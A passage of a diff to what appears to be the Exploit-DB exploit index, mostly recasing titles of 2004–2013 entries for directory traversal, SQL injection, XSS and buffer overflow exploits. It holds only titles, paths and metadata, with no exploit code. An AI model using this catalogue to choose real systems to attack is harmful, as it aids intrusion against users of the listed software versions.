vulnerability",2004-01-15,"Peter Winter-Smith",windows,remote,0 23545,platforms/hardware/remote/23545.txt,"Whale Communications e-Gap Security Appliance 2.5 Login Page Source Code Disclosure Vulnerability",2004-01-15,Procheckup,hardware,remote,0 23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b Multiple Function XSS",2004-01-16,JeiAr,php,webapps,0 23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 Adminlogin.ASP SQL Injection Vulnerability",2004-01-16,posidron,asp,webapps,0 @@ -20757,10 +20755,10 @@ id,file,description,date,author,platform,type,port 23554,platforms/php/webapps/23554.java,"YABB SE 1.x SSI.PHP ID_MEMBER SQL Injection Vulnerability",2004-01-19,BaCkSpAcE,php,webapps,0 23555,platforms/windows/remote/23555.txt,"GoAhead WebServer 2.1.x Directory Management Policy Bypass Vulnerability",2004-01-19,"Luigi Auriemma",windows,remote,0 23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component Content-Length Value Remote Denial Of Service Vulnerability",2004-01-19,"Luigi Auriemma",multiple,dos,0 -23557,platforms/multiple/remote/23557.txt,"AIPTEK NETCam Webserver 0.93.15 Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote,0 +23557,platforms/multiple/remote/23557.txt,"aiptek netcam webserver 0.93.15 - Directory Traversal vulnerability",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote,0 23558,platforms/php/webapps/23558.txt,"PHPix 2.0.3 Remote Arbitrary Command Execution Vulnerability",2004-01-20,"Max Stepanov",php,webapps,0 23559,platforms/windows/remote/23559.txt,"WebTrends Reporting Center 6.1 Management Interface Path Disclosure Vulnerability",2004-01-20,"Oliver Karow",windows,remote,0 -23560,platforms/windows/remote/23560.txt,"Anteco Visual Technologies OwnServer 1.0 Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 +23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23561,platforms/asp/webapps/23561.txt,"DUware Software Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 Cross-Site Scripting Vulnerability",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 @@ -20771,7 +20769,7 @@ id,file,description,date,author,platform,type,port 23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS (ASP.NET) Arbitrary File Upload",2012-12-21,040,asp,webapps,0 23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware <= 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 -23573,platforms/php/webapps/23573.txt,"Banana Dance B.2.6 Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 +23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 Multiple SQL Injection Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT Remote Command Execution",2012-12-23,metasploit,unix,remote,0 @@ -20789,16 +20787,16 @@ id,file,description,date,author,platform,type,port 23591,platforms/windows/remote/23591.c,"RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (1)",2004-01-24,mandragore,windows,remote,0 23592,platforms/windows/remote/23592.c,"RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (2)",2004-01-25,mslug@safechina.net,windows,remote,0 23593,platforms/multiple/remote/23593.txt,"Oracle HTTP Server 8.1.7/9.0.1/9.2 isqlplus Cross-Site Scripting Vulnerability",2004-01-24,"Rafel Ivgi The-Insider",multiple,remote,0 -23594,platforms/windows/remote/23594.txt,"TinyServer 1.1 Directory Traversal",2004-01-24,"Donato Ferrante",windows,remote,0 +23594,platforms/windows/remote/23594.txt,"tinyserver 1.1 - Directory Traversal",2004-01-24,"Donato Ferrante",windows,remote,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 Denial of service",2004-01-24,"Donato Ferrante",windows,dos,0 23596,platforms/windows/remote/23596.txt,"TinyServer 1.1 Cross-site scripting",2004-01-24,"Donato Ferrante",windows,remote,0 -23597,platforms/windows/remote/23597.txt,"Borland Web Server for Corel Paradox 1.0 b3 Directory Traversal Vulnerability",2004-01-24,"Rafel Ivgi The-Insider",windows,remote,0 +23597,platforms/windows/remote/23597.txt,"borland web server for corel paradox 1.0 b3 - Directory Traversal vulnerability",2004-01-24,"Rafel Ivgi The-Insider",windows,remote,0 23598,platforms/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 db2www Error Message Cross-Site Scripting Vulnerability",2004-01-26,"Carsten Eiram",multiple,remote,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 Remote Global Variable Injection Vulnerability",2004-01-26,"Bharat Mediratta",php,webapps,0 23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 Cross-Site Scripting Vulnerability",2004-01-26,"Donato Ferrante",multiple,remote,0 23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP Remote Command Execution",2012-12-23,metasploit,multiple,remote,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 DCC Get Dialog Denial Of Service Vulnerability",2004-01-26,"MASTER VIPER",windows,dos,0 -23603,platforms/windows/remote/23603.py,"Herberlin BremsServer 1.2.4/3.0 Directory Traversal Vulnerability",2004-01-26,"Donato Ferrante",windows,remote,0 +23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal vulnerability",2004-01-26,"Donato Ferrante",windows,remote,0 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x Error Page Cross Site Scripting Vulnerability",2004-01-26,"CĂ©sar FernĂ¡ndez",solaris,remote,0 23606,platforms/php/webapps/23606.txt,"Xoops 2.0.x Viewtopic.php Cross-Site Scripting Vulnerability",2004-01-26,"Ben Drysdale",php,webapps,0 @@ -20837,7 +20835,7 @@ id,file,description,date,author,platform,type,port 23641,platforms/multiple/dos/23641.txt,"Cauldron Chaser 1.4/1.5 Remote Denial Of Service Vulnerability (1)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23642,platforms/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 Remote Denial Of Service Vulnerability (2)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 NavigateAndFind() Cross-Zone Policy Vulnerability",2004-02-03,"Andreas Sandblad",windows,remote,0 -23644,platforms/php/webapps/23644.php,"PHPX 3.2.3 Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0 +23644,platforms/php/webapps/23644.php,"phpx 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0 23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 showproduct.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 Cross Site Scripting Vulnerability",2004-02-04,"Shaun Colley",cgi,webapps,0 @@ -20921,7 +20919,7 @@ id,file,description,date,author,platform,type,port 23725,platforms/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 glossaries/index.php file Parameter Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23726,platforms/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 readings/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23727,platforms/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 resultsignore.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23728,platforms/linux/remote/23728.txt,"Metamail 2.7 Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0 +23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0 23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulnerability",2004-02-18,"Nick Gudov",asp,webapps,0 23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x Buddy Icon Predictable File Location Weakness",2004-02-19,"Michael Evanchik",windows,remote,0 23731,platforms/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 Remote CPU Consumption Denial Of Service Vulnerability",2004-02-20,"intuit bug_hunter",windows,dos,0 @@ -20951,7 +20949,7 @@ id,file,description,date,author,platform,type,port 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine Remote Denial Of Service Vulnerability",2004-02-24,"Luigi Auriemma",multiple,dos,0 23756,platforms/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 Cross-Site Scripting Vulnerability",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote,0 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit Remote Denial Of Service Vulnerability",2004-02-24,"Luigi Auriemma",linux,dos,0 -23758,platforms/windows/remote/23758.txt,"GWeb HTTP Server 0.5/0.6 Directory Traversal Vulnerability",2004-02-24,"Donato Ferrante",windows,remote,0 +23758,platforms/windows/remote/23758.txt,"gweb http server 0.5/0.6 - Directory Traversal vulnerability",2004-02-24,"Donato Ferrante",windows,remote,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x MFormat Privilege Escalation Vulnerability",2004-02-25,"Sebastian Krahmer",linux,local,0 23760,platforms/windows/dos/23760.pl,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (1)",2004-02-26,saintjmf,windows,dos,0 23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (2)",2004-02-26,shaun2k2,windows,dos,0 @@ -20962,7 +20960,7 @@ id,file,description,date,author,platform,type,port 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability",2003-09-11,Jelmer,windows,remote,0 -23769,platforms/windows/dos/23769.pl,"ArGoSoft FTP Server 1.0/1.2/1.4 Multiple Vulnerabilities",2004-02-27,"Beyond Security",windows,dos,0 +23769,platforms/windows/dos/23769.pl,"argosoft ftp server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",windows,dos,0 23770,platforms/php/webapps/23770.txt,"IGeneric Free Shopping Cart 1.4 SQL Injection Vulnerability",2004-03-01,"David Sopas Ferreira",php,webapps,0 23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x Multiple Format String",2004-03-01,"Ulf Harnhammar",linux,remote,0 23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x auth.c auth_ident() Function Overflow",2004-03-01,CMN,linux,remote,0 @@ -21052,7 +21050,7 @@ id,file,description,date,author,platform,type,port 23861,platforms/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 category_news.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 news_sort.asp filter Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 NEWS_LOGIN Cookie ADMIN Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 -23864,platforms/linux/remote/23864.txt,"XWeb 1.0 Directory Traversal Vulnerability",2004-03-22,"Donato Ferrante",linux,remote,0 +23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal vulnerability",2004-03-22,"Donato Ferrante",linux,remote,0 23865,platforms/php/webapps/23865.txt,"VBulletin 2.x Private.PHP Cross-Site Scripting Vulnerability",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 Multiple SQL Injection Vulnerabilities",2004-03-23,JeiAr,php,webapps,0 @@ -21060,7 +21058,7 @@ id,file,description,date,author,platform,type,port 23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0 23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection Vulnerability",2004-03-22,"Janek Vind",php,webapps,0 23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 TargetName Parameter Cross-Site Scripting Vulnerability",2004-03-22,"Richard Maudsley",windows,remote,0 -23872,platforms/jsp/webapps/23872.txt,"ReGet Deluxe 3.0 build 121 Directory Traversal Vulnerability",2004-03-22,snifer,jsp,webapps,0 +23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal vulnerability",2004-03-22,snifer,jsp,webapps,0 23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x Encryption Key Signing Vulnerability",2004-03-23,"Todd Chapman",multiple,remote,0 23874,platforms/solaris/local/23874.txt,"Sun Solaris 2.6/7.0/8/9 vfs_getvfssw function Local Privilege Escalation Vulnerability",2004-03-23,"Sinan Eren",solaris,local,0 23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability",2004-03-24,"Tri Huynh",windows,remote,0 @@ -21074,7 +21072,7 @@ id,file,description,date,author,platform,type,port 23883,platforms/aix/local/23883.pl,"AIX 4.3.3/5.1 Invscoutd Symbolic Link Vulnerability",2003-05-29,watercloud,aix,local,0 23884,platforms/linux/dos/23884.txt,"NSTX 1.0/1.1 Remote Denial Of Service Vulnerability",2004-03-26,"laurent oudot",linux,dos,0 23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0 -23886,platforms/windows/webapps/23886.txt,"Simple Webserver 2.3-rc1 Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 +23886,platforms/windows/webapps/23886.txt,"simple webserver 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 23887,platforms/windows/remote/23887.rb,"Enterasys NetSight nssyslogd.exe Buffer Overflow",2013-01-04,metasploit,windows,remote,0 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x HTML Injection Vulnerability",2004-03-29,"koi8-r Shelz",cgi,webapps,0 @@ -21096,7 +21094,7 @@ id,file,description,date,author,platform,type,port 23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 Remote File Download Vulnerability",2004-04-01,"Donato Ferrante",windows,remote,0 23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability",2004-04-03,K-159,cgi,webapps,0 23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 MyHome.PHP SQL Injection Vulnerability",2004-04-05,"Mark Tesn",php,webapps,0 -23909,platforms/windows/remote/23909.txt,"ADA IMGSVR 0.4 Directory Traversal Vulnerability",2004-04-05,dr_insane,windows,remote,0 +23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal vulnerability",2004-04-05,dr_insane,windows,remote,0 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 Local Privilege Escalation Vulnerability",2004-04-06,"Ian Vitek",windows,local,0 23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21122,7 +21120,7 @@ id,file,description,date,author,platform,type,port 23933,platforms/php/webapps/23933.txt,"NukeCalendar 1.1 .a eid Parameter SQL Injection",2004-04-08,"Janek Vind",php,webapps,0 23934,platforms/php/webapps/23934.txt,"AzDGDatingLite 2.1.1 index.php language Parameter XSS",2004-04-07,"Janek Vind",php,webapps,0 23935,platforms/php/webapps/23935.txt,"AzDGDatingLite 2.1.1 view.php id Parameter XSS",2004-04-07,"Janek Vind",php,webapps,0 -23936,platforms/linux/remote/23936.pl,"LCDproc LCDd 0.x/4.x Multiple Remote Vulnerabilities",2004-04-08,wsxz,linux,remote,0 +23936,platforms/linux/remote/23936.pl,"lcdproc lcdd 0.x/4.x Multiple Vulnerabilities",2004-04-08,wsxz,linux,remote,0 23937,platforms/cgi/webapps/23937.txt,"1st Class Mail Server 4.0 1 viewmail.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 23938,platforms/cgi/webapps/23938.txt,"1st Class Mail Server 4.0 1 Index XSS",2004-04-08,dr_insane,cgi,webapps,0 23939,platforms/cgi/webapps/23939.txt,"1st Class Mail Server 4.0 1 members.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 @@ -21177,8 +21175,8 @@ id,file,description,date,author,platform,type,port 23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability",2004-04-18,mslug@safechina.net,windows,local,0 23990,platforms/php/webapps/23990.txt,"PHP-Nuke 6.x/7.x CookieDecode Cross-Site Scripting Vulnerability",2004-04-13,waraxe,php,webapps,0 23991,platforms/php/webapps/23991.txt,"Tutos 1.1 .20031017 note_overview.php id Parameter SQL Injection",2004-04-13,"François SORIN",php,webapps,0 -23993,platforms/php/webapps/23993.txt,"Websitebaker Add-on Concert Calendar 2.1.4 Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 -23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 Multiple Vulnerabilities",2013-01-09,cr4wl3r,php,webapps,0 +23993,platforms/php/webapps/23993.txt,"websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 +23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,cr4wl3r,php,webapps,0 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0 23997,platforms/php/webapps/23997.txt,"WeBid 1.0.6 SQL Injection Vulnerability",2013-01-09,"Life Wasted",php,webapps,0 @@ -21251,7 +21249,7 @@ id,file,description,date,author,platform,type,port 24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0 24065,platforms/hardware/remote/24065.java,"Siemens S55 Cellular Telephone SMS Confirmation Message Bypass Vulnerability",2004-04-27,FtR,hardware,remote,0 24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 Remote Denial Of Service Vulnerability",2004-04-27,"Donato Ferrante",multiple,dos,0 -24067,platforms/unix/remote/24067.c,"LHA 1.x Buffer Overflow/Directory Traversal Vulnerabilities",2004-04-30,N4rK07IX,unix,remote,0 +24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow/Directory Traversal Vulnerabilities",2004-04-30,N4rK07IX,unix,remote,0 24068,platforms/php/webapps/24068.txt,"SquirrelMail 1.4.x Folder Name Cross-Site Scripting Vulnerability",2004-04-30,"Alvin Alex",php,webapps,0 24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6.0 Meta Data Foreign Domain Spoofing Vulnerability",2004-04-30,E.Kellinis,windows,remote,0 24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1 B Remote Heap Buffer Overflow Vulnerability",2004-04-30,"Slotto Corleone",multiple,dos,0 @@ -21313,7 +21311,7 @@ id,file,description,date,author,platform,type,port 24128,platforms/windows/dos/24128.txt,"ActivePerl 5.x,Cygwin 1.5.x System Function Call Buffer Overflow Vulnerability",2004-05-18,"Oliver Karow",windows,dos,0 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPD 2.x/3.0 Get Request Buffer Overflow Vulnerability",2004-04-23,CoolICE,windows,remote,0 24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x,Larry Wall Perl 5.x Duplication Operator Integer Overflow Vulnerability",2004-05-18,"Matt Murphy",multiple,dos,0 -24131,platforms/php/webapps/24131.txt,"DSM Light Web File Browser 2.0 Directory Traversal Vulnerability",2004-05-18,Humberto,php,webapps,0 +24131,platforms/php/webapps/24131.txt,"dsm light web file browser 2.0 - Directory Traversal vulnerability",2004-05-18,Humberto,php,webapps,0 24133,platforms/windows/remote/24133.rb,"Freesshd Authentication Bypass",2013-01-15,metasploit,windows,remote,0 24134,platforms/php/webapps/24134.txt,"CMS snews SQL Injection Vulnerability",2013-01-15,"By onestree",php,webapps,0 24135,platforms/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 CSS Style Sheet Memory Corruption Vulnerability",2004-05-18,henkie_is_leet,windows,dos,0 @@ -21381,7 +21379,7 @@ id,file,description,date,author,platform,type,port 24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 SSI.PHP Cross-Site Scripting Vulnerability",2004-06-14,"IMAN Sharafoddin",php,webapps,0 24200,platforms/windows/local/24200.txt,"Sygate Personal Firewall Pro 5.5 Local Fail-Close Bypass Vulnerability",2004-06-14,"Tan Chew Keong",windows,local,0 24201,platforms/php/webapps/24201.txt,"php-Charts Arbitrary PHP Code Execution Vulnerability",2013-01-18,AkaStep,php,webapps,0 -24202,platforms/hardware/webapps/24202.txt,"Linksys WRT54GL Firmware 4.30.15 build 2 Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 +24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24205,platforms/linux/remote/24205.txt,"Novell NCP Pre-Auth Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 @@ -21431,7 +21429,7 @@ id,file,description,date,author,platform,type,port 24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness",2004-07-03,http-equiv,windows,remote,0 24250,platforms/multiple/remote/24250.pl,"MySQL 4.1/5.0 Authentication Bypass Vulnerability",2004-07-05,"Eli Kara",multiple,remote,0 24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-spam 6.0 Unauthorized Message Disclosure Vulnerability",2004-07-05,"Thomas Springer",cgi,webapps,0 -24252,platforms/cgi/webapps/24252.txt,"Fastream NetFile FTP/Web Server 6.5/6.7 Directory Traversal Vulnerability",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 +24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal vulnerability",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 Cross-Site Scripting Vulnerability",2004-07-05,"Donato Ferrante",multiple,remote,0 24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 Email Header HTML Injection Vulnerability",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 index.php gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 @@ -21528,7 +21526,7 @@ id,file,description,date,author,platform,type,port 24347,platforms/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 Remote Command Execution Vulnerability",2004-08-04,"Francisco Alisson",cgi,webapps,0 24348,platforms/php/webapps/24348.txt,"eNdonesia 8.3 Search Form Cross-Site Scripting Vulnerability",2004-08-04,"Ahmad Muammar",php,webapps,0 24349,platforms/php/webapps/24349.txt,"PHP-Nuke 0-7 Delete God Admin Access Control Bypass Vulnerability",2004-08-04,"Ahmad Muammar",php,webapps,0 -24350,platforms/windows/remote/24350.txt,"Acme thttpd 2.0.7 Directory Traversal Vulnerability",2004-08-04,CoolICE,windows,remote,0 +24350,platforms/windows/remote/24350.txt,"acme thttpd 2.0.7 - Directory Traversal vulnerability",2004-08-04,CoolICE,windows,remote,0 24351,platforms/multiple/dos/24351.c,"Free Web Chat Initial Release UserManager.java Null Pointer DoS",2004-08-04,"Donato Ferrante",multiple,dos,0 24352,platforms/multiple/dos/24352.java,"Free Web Chat Initial Release Connection Saturation DoS",2004-08-04,"Donato Ferrante",multiple,dos,0 24353,platforms/unix/remote/24353.sql,"Oracle 9i Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 @@ -21541,7 +21539,7 @@ id,file,description,date,author,platform,type,port 24360,platforms/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (1)",2004-08-09,"Juan Pablo Martinez Kuhn",linux,dos,0 24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (2)",2004-08-09,jsk,linux,remote,0 24362,platforms/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 Firewall.INI Local Buffer Overrun Vulnerability",2004-08-11,"Paul Craig",windows,dos,0 -24363,platforms/windows/remote/24363.txt,"Clearswift MIMEsweeper For Web 4.0/5.0 Directory Traversal Vulnerability",2004-07-11,"Kroma Pierre",windows,remote,0 +24363,platforms/windows/remote/24363.txt,"clearswift mimesweeper for web 4.0/5.0 - Directory Traversal vulnerability",2004-07-11,"Kroma Pierre",windows,remote,0 24364,platforms/php/webapps/24364.txt,"WordPress SolveMedia 1.1.0 CSRF Vulnerability",2013-01-25,"Junaid Hussain",php,webapps,0 24365,platforms/php/webapps/24365.txt,"ImageCMS 4.0.0b Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",php,webapps,0 24366,platforms/windows/local/24366.rb,"Windows Manage Memory Payload Injection",2013-01-25,metasploit,windows,local,0 @@ -21579,7 +21577,7 @@ id,file,description,date,author,platform,type,port 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 Predictable Temporary File Creation Vulnerability",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay Pad_selected Parameter Cross-Site Scripting Vulnerability",2004-08-23,"King Of Love",php,webapps,0 24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 -24401,platforms/cgi/webapps/24401.txt,"Axis Network Camera 2.x And Video Server 1-3 directory traversal vulnerability",2004-08-23,bashis,cgi,webapps,0 +24401,platforms/cgi/webapps/24401.txt,"axis network camera 2.x and video server 1-3 - Directory Traversal vulnerability",2004-08-23,bashis,cgi,webapps,0 24402,platforms/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps,0 24403,platforms/php/webapps/24403.txt,"EGroupWare 1.0 Calendar Module date Parameter XSS",2004-08-23,"Joxean Koret",php,webapps,0 24404,platforms/windows/remote/24404.txt,"Gadu-Gadu 6.0 File Download Filename Obfuscation Weakness",2004-08-23,"Bartosz Kwitkowski",windows,remote,0 @@ -21592,7 +21590,7 @@ id,file,description,date,author,platform,type,port 24411,platforms/windows/local/24411.c,"Sysinternals Regmon 6.11 Local Denial of 